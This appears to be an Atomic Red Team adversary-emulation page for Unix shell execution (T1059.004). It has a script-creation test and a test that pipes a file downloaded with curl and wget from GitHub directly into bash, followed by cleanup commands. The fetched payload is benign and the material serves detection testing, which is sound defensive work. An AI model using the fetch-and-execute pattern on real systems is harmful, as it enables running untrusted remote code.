Adversaries may abuse Bash commands and scripts for execution. Bash, the primary macOS (through Mojave) and Linux shell, can control every aspect of a system, with certain commands requiring elevated privileges.Bash scripts (.sh) provide the shell with a list of sequential commands to run, as well as normal scripting operations such as conditionals and loops. Common uses of Bash scripts include long or repetitive tasks, or the need to run the same set of commands on multiple systems.
Creates and executes a simple bash script.
Supported Platforms: macOS, Linux
| Name | Description | Type | Default Value |
|---|---|---|---|
| script_path | Script path | path | /tmp/art.sh |
sh -c "echo 'echo Hello from the Atomic Red Team' > #{script_path}"
sh -c "echo 'ping -c 4 8.8.8.8' >> #{script_path}"
chmod +x #{script_path}
sh #{script_path}rm #{script_path}Using Curl to download and pipe a payload to Bash. NOTE: Curl-ing to Bash is generally a bad idea if you don't control the server.
Upon successful execution, sh will download via curl and wget the specified payload (echo-art-fish.sh) and set a marker file in /tmp/art-fish.txt.
Supported Platforms: macOS, Linux
curl -sS https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.004/echo-art-fish.sh | bash
wget --quiet -O - https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.004/echo-art-fish.sh | bashrm /tmp/art-fish.txt